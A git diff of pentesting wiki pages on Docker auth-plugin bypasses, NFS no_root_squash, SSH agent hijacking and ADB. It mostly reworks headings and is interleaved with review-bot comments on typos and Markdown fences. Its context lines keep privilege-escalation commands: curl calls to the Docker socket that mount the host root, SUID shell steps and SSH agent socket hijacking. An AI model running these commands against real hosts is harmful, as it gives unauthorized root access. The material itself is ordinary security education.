a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md 
+++ b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -1,8 +1,10 @@ +# Docker Access Authorization Plugin + {{#include ../../../banners/hacktricks-training.md}} **Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon. -# Basic architecture +## Basic architecture Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**. 
@@ -22,13 +24,13 @@ For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), s During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies. -## Several Plugins +### Several Plugins You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted. -# Plugin Examples +## Plugin Examples -## Twistlock AuthZ Broker +### Twistlock AuthZ Broker The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user. 
@@ -36,29 +38,29 @@ This is an example that will allow Alice and Bob can create new containers: `{"n In the page [route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action -## Simple Plugin Tutorial +### Simple Plugin Tutorial You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) Read the `README` and the `plugin.go` code to understand how is it working. -# Docker Auth Plugin Bypass +## Docker Auth Plugin Bypass -## Enumerate access +### Enumerate access The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**. To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**.** -## disallowed `run --privileged` +### disallowed `run --privileged` -### Minimum Privileges +#### Minimum Privileges ```bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash ``` -### Running a container and then getting a privileged session +#### Running a container and then getting a privileged session In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: 
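Review bot: the demoted heading `+### disallowed `run --privileged`` keeps a lowercase first word while every sibling heading in this file ("Enumerate access", "Mount Writable Folder", "Unchecked API Endpoint") starts with a capital; while touching the line, write it as "### Disallowed `run --privileged`". The hunk's header context also carries a grammar slip, "will allow Alice and Bob can create new containers", which should read "will allow Alice and Bob to create new containers".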
@@ -84,7 +86,7 @@ docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a3 Now, the user can escape from the container using any of the [**previously discussed techniques**](#privileged-flag) and **escalate privileges** inside the host. -## Mount Writable Folder +### Mount Writable Folder In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: @@ -104,15 +106,15 @@ host> /tmp/bash > > Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) -## Unchecked API Endpoint +### Unchecked API Endpoint The responsibility of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.** You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) -## Unchecked JSON Structure +### Unchecked JSON Structure -### Binds in root +#### Binds in root It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\ In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: 
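Review bot: the context line in the header of the first hunk, `docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a3...`, has a triple dash, so the command as printed fails to parse; beyond the typo, `docker exec` does not accept `--cap-add` at all (it only exposes `--privileged` for elevating an exec session), so the step either needs `--privileged` here or the capability has to be granted at `docker run` time. Worth correcting while this file is open, because the "Running a container and then getting a privileged session" technique hinges on that exact command.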
@@ -130,7 +132,7 @@ docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it > [!WARNING] > Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`** -### Binds in HostConfig +#### Binds in HostConfig Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: @@ -138,7 +140,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create ``` -### Mounts in root +#### Mounts in root Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: @@ -146,7 +148,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create ``` -### Mounts in HostConfig +#### Mounts in HostConfig Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: 
@@ -154,7 +156,7 @@ Follow the same instruction as with **Binds in root** performing this **request* curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre ``` -## Unchecked JSON Attribute +### Unchecked JSON Attribute It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability: @@ -171,7 +173,7 @@ capsh --print > [!TIP] > The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions. -## Disabling Plugin +### Disabling Plugin If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it! @@ -189,7 +191,7 @@ docker plugin enable authobot Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**! -## Auth Plugin Bypass writeups +### Auth Plugin Bypass writeups - [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/) 
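Review bot: the header context of the "Disabling Plugin" hunk, "If the **sysadmin** **forgotten** to **forbid**", should read "If the sysadmin forgot to forbid" (or "has forgotten"); a one-word fix in a hunk this commit is already touching. Note also that the header context of the first hunk on this line ends in `http:/v1.40/containers/cre`, which looks truncated relative to the `containers/create` endpoint used by the sibling curl examples; check the source line rather than assuming it is a display artifact.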
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index f5d6b4820..810805fbe 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -1,6 +1,8 @@ +# Release Agent Exploit: Relative Paths to PIDs + {{#include ../../../../banners/hacktricks-training.md}} -For further details **check the blog port from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: +For further details **check the blog post from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: The technique outlines a method for **executing host code from within a container**, overcoming challenges posed by storage-driver configurations that obscure the container's filesystem path on the host, like Kata Containers or specific `devicemapper` settings. diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md index a35b0ab04..a6d1f5b9e 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md 
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md @@ -136,7 +136,8 @@ int main(void) { - Used for handling kernel device `uevents`. - Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers. -- **Example for Exploitation**: %%%bash +- **Example for Exploitation**: +```bash #### Creates a payload @@ -156,7 +157,8 @@ int main(void) { #### Reads the output - cat /output %%% + cat /output + ``` #### **`/sys/class/thermal`** diff --git a/src/linux-hardening/privilege-escalation/logstash.md b/src/linux-hardening/privilege-escalation/logstash.md index e2e369d64..de5970674 100644 --- a/src/linux-hardening/privilege-escalation/logstash.md +++ b/src/linux-hardening/privilege-escalation/logstash.md @@ -1,3 +1,5 @@ +# Logstash Privilege Escalation + {{#include ../../banners/hacktricks-training.md}} ## Logstash diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 18fb0d773..08071e298 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,7 +1,9 @@ +# NFS No Root Squash Misconfiguration Privilege Escalation + {{#include ../../banners/hacktricks-training.md}} -# Squashing Basic Info +## Squashing Basic Info NFS will usually (specially in linux) trust the indicated `uid` and `gid` by the client conencting to access the files (if kerberos is not used). However, there are some configurations that can be set in the server to **change this behavior**: 
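Review bot: in the sensitive-mounts.md hunk the replacement for `%%%bash` opens the fence at column 0 (`+```bash`) directly under the list item `- **Example for Exploitation**:`, but the closing fence is written indented (`+  ```` after `+  cat /output`). In CommonMark a fence only closes when its indentation is within three spaces of the opening fence's, and a fence at column 0 terminates the surrounding list, so the example either fails to close or drops out of the bullet. Indent both fences consistently under the list item (two or four spaces, matching the item's content) so the block stays attached to "Example for Exploitation" and closes where intended.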
@@ -17,9 +19,9 @@ For more information about **NFS** check: ../../network-services-pentesting/nfs-service-pentesting.md {{#endref}} -# Privilege Escalation +## Privilege Escalation -## Remote Exploit +### Remote Exploit Option 1 using bash: - **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. @@ -57,7 +59,7 @@ cd ./payload #ROOT shell ``` -## Local Exploit +### Local Exploit > [!TIP] > Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\ @@ -65,11 +67,11 @@ cd > Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\ > --_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- -## Basic Information +### Basic Information The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls. -### Compiling the Library +#### Compiling the Library The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands: 
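Review bot: the "Local Exploit" hunk in nfs-no_root_squash-misconfiguration-pe.md carries the context lines "the export inside `/etc/export`" and "if `/etc/export` is indicating an IP address"; the NFS export table is `/etc/exports` (plural), and since `insecure` is the flag readers will go looking for in that file, the wrong filename will send them to a path that does not exist. Fix both occurrences in this pass.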
@@ -80,7 +82,7 @@ make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` -### Conducting the Exploit +#### Conducting the Exploit The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls: @@ -108,7 +110,7 @@ LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs:/ #root ``` -## Bonus: NFShell for Stealthy File Access +### Bonus: NFShell for Stealthy File Access Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues: diff --git a/src/linux-hardening/privilege-escalation/selinux.md b/src/linux-hardening/privilege-escalation/selinux.md index e8a2ce0f6..d0f138c2b 100644 --- a/src/linux-hardening/privilege-escalation/selinux.md +++ b/src/linux-hardening/privilege-escalation/selinux.md @@ -1,6 +1,8 @@ +# # SELinux + {{#include ../../banners/hacktricks-training.md}} -# SELinux in Containers +## SELinux in Containers [Introduction and example from the redhat docs](https://www.redhat.com/sysadmin/privileged-flag-container-engines) @@ -16,7 +18,7 @@ LABEL system_u:system_r:container_t:s0:c647,c780 ``` -# SELinux Users +## SELinux Users There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. 
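Review bot: the new title line in selinux.md is `+# # SELinux`, a doubled hash; Markdown will render it as an H1 whose visible text is "# SELinux" and the sidebar/summary entry will carry the literal hash as well. It should be `# SELinux`, matching the single-hash H1s added to every other file in this commit.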
diff --git a/src/linux-hardening/privilege-escalation/socket-command-injection.md b/src/linux-hardening/privilege-escalation/socket-command-injection.md index 35724b2e7..d328a2019 100644 --- a/src/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/src/linux-hardening/privilege-escalation/socket-command-injection.md @@ -1,3 +1,5 @@ +# Socket Command Injection + {{#include ../../banners/hacktricks-training.md}} ## Socket binding example with Python diff --git a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index f4decda94..b6ff4cfce 100644 --- a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -1,6 +1,8 @@ +# SSH Agent Forwarding Exploitation + {{#include ../../banners/hacktricks-training.md}} -# Summary +## Summary What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this: @@ -16,7 +18,7 @@ Impersonate Bob using one of Bob's ssh-agent: SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston ``` -## Why does this work? +### Why does this work? When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it. @@ -24,7 +26,7 @@ As the private key is saved in the memory of the agent uncrypted, I suppose that Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key. -# Long explanation and exploitation +## Long explanation and exploitation **Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)** {{#include ../../banners/hacktricks-training.md}} 
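Review bot: the ssh-forward-agent-exploitation.md hunk keeps the context line "What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config`"; the system-wide OpenSSH client config is `/etc/ssh/ssh_config`, and `/etc/ssh_config` is not a path a reader will find on the box. While in the file, the "Why does this work?" hunk also has "Bobs ssh connection" (Bob's) and "saved in the memory of the agent uncrypted" (unencrypted), both in visible context lines.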
diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index d4a14d137..e640b4ad1 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -1,3 +1,5 @@ +# Wildcards Spare Tricks + {{#include ../../banners/hacktricks-training.md}} ## chown, chmod diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index 7c50b0ed1..e22eb9ef3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md 
@@ -10,7 +10,10 @@ Bundles in macOS serve as containers for a variety of resources including applic Within a bundle, particularly within the `.app/Contents/` directory, a variety of important resources are housed: -- **\_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: %%%bash openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 %%% +- **\_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: +```bash +openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 +``` - **MacOS**: Contains the executable binary of the application that runs upon user interaction. - **Resources**: A repository for the application's user interface components including images, documents, and interface descriptions (nib/xib files). - **Info.plist**: Acts as the application's main configuration file, crucial for the system to recognize and interact with the application appropriately. diff --git a/src/mobile-pentesting/android-app-pentesting/adb-commands.md b/src/mobile-pentesting/android-app-pentesting/adb-commands.md index 0b797b0c2..7ac1903ec 100644 --- a/src/mobile-pentesting/android-app-pentesting/adb-commands.md +++ b/src/mobile-pentesting/android-app-pentesting/adb-commands.md @@ -1,3 +1,5 @@ +# ADB Commands + {{#include ../../banners/hacktricks-training.md}} **Adb is usually located in:** @@ -12,7 +14,7 @@ C:\Users\\AppData\Local\Android\sdk\platform-tools\adb.exe **Information obtained from:** [**http://adbshell.com/**](http://adbshell.com) -# Connection +## Connection ``` adb devices 
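Review bot: in macos-bundles.md the `%%%bash` pseudo-fence is replaced with a real fence, but the new `+```bash` / `+```` lines sit at column 0 inside the `- **\_CodeSignature**:` bullet, which ends the list before `- **MacOS**:`; indent the fence and its command by the list item's content offset so `_CodeSignature`, `MacOS`, `Resources` and `Info.plist` stay one list. Separately, the command kept in the block, `openssl dgst -binary -sha1 .../Resources/Assets.car | openssl base64`, only hashes one resource file; if the sentence promises to "inspect the code-signing information", `codesign -dv --verbose=4 /Applications/Safari.app` is the command that actually prints the signature, entitlements and CDHash, so consider either adding it or narrowing the sentence to what the `openssl` line shows.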
@@ -40,7 +42,7 @@ adb server version (41) doesn't match this client (36); killing... It's because you are trying to connect to an ADB server with a different version. Just try to find the adb binary the software is using (go to `C:\Program Files\Genymobile\Genymotion` and search for adb.exe) -## Several devices +### Several devices Whenever you find **several devices connected to your machine** you will need to **specify in which one** you want to run the adb command. @@ -57,7 +59,7 @@ x86_64:/ # whoami root ``` -## Port Tunneling +### Port Tunneling In case the **adb** **port** is only **accessible** from **localhost** in the android device but **you have access via SSH**, you can **forward the port 5555** and connect via adb: @@ -66,11 +68,11 @@ ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222 adb connect 127.0.0.1:5555 ``` -# Packet Manager +## Packet Manager -## Install/Uninstall +### Install/Uninstall -### adb install \[option] \ +#### adb install \[option] \ ```bash adb install test.apk @@ -88,7 +90,7 @@ adb install -d test.apk # allow version code downgrade adb install -p test.apk # partial application install ``` -### adb uninstall \[options] \ +#### adb uninstall \[options] \ ```bash adb uninstall com.test.app @@ -96,11 +98,11 @@ adb uninstall com.test.app adb uninstall -k com.test.app Keep the data and cache directories around after package removal. ``` -## Packages +### Packages Prints all packages, optionally only those whose package name contains the text in \. -### adb shell pm list packages \[options] \ +#### adb shell pm list packages \[options] \ ```bash adb shell pm list packages @@ -122,7 +124,7 @@ adb shell pm list packages -u #Also include uninstalled packages. adb shell pm list packages --user #The user space to query. ``` -### adb shell pm path \ +#### adb shell pm path \ Print the path to the APK of the given . 
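Review bot: the demoted heading `+## Packet Manager` in adb-commands.md should be "Package Manager"; the section covers `adb install`, `adb uninstall` and `adb shell pm ...`, and `pm` is Android's package manager, not a packet tool. Since the line is already being rewritten for its level, fix the word at the same time.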
@@ -130,7 +132,7 @@ Print the path to the APK of the given . adb shell pm path com.android.phone ``` -### adb shell pm clear \ +#### adb shell pm clear \ Delete all data associated with a package. @@ -138,7 +140,7 @@ Delete all data associated with a package. adb shell pm clear com.test.abc ``` -# File Manager +## File Manager ### adb pull \ \[local] @@ -156,7 +158,7 @@ Upload a specified file from your computer to an emulator/device. adb push test.apk /sdcard ``` -# Screencapture/Screenrecord +## Screencapture/Screenrecord ### adb shell screencap \ @@ -183,7 +185,7 @@ adb shell screenrecord --verbose **You can download the files (images and videos) using **_**adb pull**_ -# Shell +## Shell ### adb shell @@ -214,7 +216,7 @@ am broadcast [] #Send a broadcast. Whiout options you can see the help input [text|keyevent] #Send keystrokes to device ``` -# Processes +## Processes If you want to get the PID of the process of your application you can execute: @@ -232,7 +234,7 @@ adb shell pidof com.your.application And it will print the PID of the application -# System +## System ```bash adb root @@ -246,9 +248,9 @@ adb sideload flashing/restoring Android update.zip packages. -# Logs +## Logs -## Logcat +### Logcat To **filter the messages of only one application**, get the PID of the application and use grep (linux/macos) or findstr (windows) to filter the output of logcat: @@ -257,7 +259,7 @@ adb logcat | grep 4526 adb logcat | findstr 4526 ``` -### adb logcat \[option] \[filter-specs] +#### adb logcat \[option] \[filter-specs] ```bash adb logcat @@ -281,7 +283,7 @@ adb logcat *:F # filter to only show Fatal level adb logcat *:S # Silent, highest priority, on which nothing is ever printed ``` -### adb logcat -b \ +#### adb logcat -b \ ```bash adb logcat -b # radio View the buffer that contains radio/telephony related messages. 
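Review bot: the header context of the "Shell" hunk in adb-commands.md contains broken emphasis, `**You can download the files (images and videos) using **_**adb pull**_`, where the bold span is opened twice and closed once and the trailing `_**...**_` nests markers in an order most renderers will not balance; rewrite it as plain text with a single code span (`adb pull`). The same hunk's context also has "Whiout options" for "Without options".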
@@ -301,11 +303,11 @@ adb logcat -g # Prints the size of the specified log buffer and exits. adb logcat -n # Sets the maximum number of rotated logs to . ``` -## dumpsys +### dumpsys dumps system data -### adb shell dumpsys \[options] +#### adb shell dumpsys \[options] ```bash adb shell dumpsys @@ -329,7 +331,7 @@ adb shell dumpsys batterystats --reset erases old collection data adb shell dumpsys activity -# Backup +## Backup Backup an android device from adb. diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md index 2932c02db..091ff3ca2 100644 --- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -1,3 +1,5 @@ +# Content Protocol in Android + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index 10ab891d9..332e97030 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -1,3 +1,5 @@ +# Intent Injection + {{#include ../../banners/hacktricks-training.md}} **Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)** diff --git a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index 00b7a816b..7a1b73039 100644 --- a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md 
@@ -1,12 +1,14 @@ +# Make APK accept CA certificate + {{#include ../../banners/hacktricks-training.md}} Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. -# Automatic +## Automatic The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically** make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any). -# Manual +## Manual First we decompile the app: `apktool d *file-name*.apk` diff --git a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index e9b9715db..a77773ba5 100644 --- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -1,3 +1,5 @@ +# Manual De-obfuscation Techniques + {{#include ../../banners/hacktricks-training.md}} ## Manual **De-obfuscation Techniques** diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md index f57170e27..6221dc20e 100644 --- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -1,7 +1,7 @@ -{{#include ../../banners/hacktricks-training.md}} - # React Native Application Analysis +{{#include ../../banners/hacktricks-training.md}} + To confirm if the application was built on the React Native framework, follow these steps: 1. Rename the APK file with a zip extension and extract it to a new folder using the command `cp com.example.apk example-apk.zip` and `unzip -qq example-apk.zip -d ReactNative`. 
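Review bot: in manual-deobfuscation.md the new H1 `+# Manual De-obfuscation Techniques` is immediately followed by the existing H2 `## Manual **De-obfuscation Techniques**`, so the rendered page now shows the same title twice in a row with only the banner between them. Either drop the H2 (the H1 now carries the title, as in the other files in this commit) or rename it to describe the first subsection. The react-native-application.md hunk, by contrast, does the right thing by moving the banner include below the title rather than adding a second one.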
@@ -80,10 +80,6 @@ The tool **[hermes_rs](https://github.com/Pilfer/hermes_rs)** supports rebuildin You could try to dynamically analyze the app would be to use Frida to enable the developer mode of the React app and use **`react-native-debugger`** to attach to it. However, for this you need the source code of the app apparently. You can find more info about this in [https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/](https://newsroom.bedefended.com/hooking-react-native-applications-with-frida/). - - - - ## References - [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7) diff --git a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index 6e7e434b2..4c8891c59 100644 --- a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -1,3 +1,5 @@ +# Spoofing Your Location in Google Play Store + {{#include ../../banners/hacktricks-training.md}} In situations where an application is restricted to certain countries, and you're unable to install it on your Android device due to regional limitations, spoofing your location to a country where the app is available can grant you access. The steps below detail how to do this: diff --git a/src/mobile-pentesting/ios-pentesting/ios-basics.md b/src/mobile-pentesting/ios-pentesting/ios-basics.md index 0f9a8ea0f..7f43410d3 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/src/mobile-pentesting/ios-pentesting/ios-basics.md 
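Review bot: the header context of the react-native-application.md hunk reads "You could try to dynamically analyze the app would be to use Frida", which fuses two sentence starts; "One way to dynamically analyze the app is to use Frida" is the intended sense. Only blank lines are removed here, so it is a drive-by, but it is the sentence the reader lands on right above the references being cleaned up.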
@@ -1,12 +1,14 @@ +# iOS Basics + {{#include ../../banners/hacktricks-training.md}} -# Privilege Separation and Sandbox +## Privilege Separation and Sandbox In iOS, a distinction in privilege exists between the user-accessible applications and the system's core processes. Applications run under the **`mobile`** user identity, while the crucial system processes operate as **`root`**. This separation is enhanced by a sandbox mechanism, which imposes strict limitations on what actions applications can undertake. For instance, even if applications share the same user identity, they are prohibited from accessing or modifying each other's data. Applications are installed in a specific directory (`private/var/mobile/Applications/{random ID}`) and have restricted read access to certain system areas and functionalities, such as SMS and phone calls. Access to protected areas triggers a pop-up request for user permission. -# Data Protection +## Data Protection iOS offers developers the **Data Protection APIs**, built atop the Secure Enclave Processor (SEP) — a dedicated coprocessor for cryptographic operations and key management. The SEP ensures data protection integrity via a unique device-specific key, the device UID, embedded within it. 
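Review bot: the "Privilege Separation and Sandbox" hunk in ios-basics.md keeps the context path `private/var/mobile/Applications/{random ID}` without a leading slash; it should at least be `/private/var/mobile/Applications/...`. That layout is also the pre-iOS 8 one: on current iOS the bundle lives under `/private/var/containers/Bundle/Application/<UUID>/` and the app's data under `/private/var/mobile/Containers/Data/Application/<UUID>/`, so a reader checking a jailbroken device against this sentence will not find the directory. Worth updating while the section headings are being reworked.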
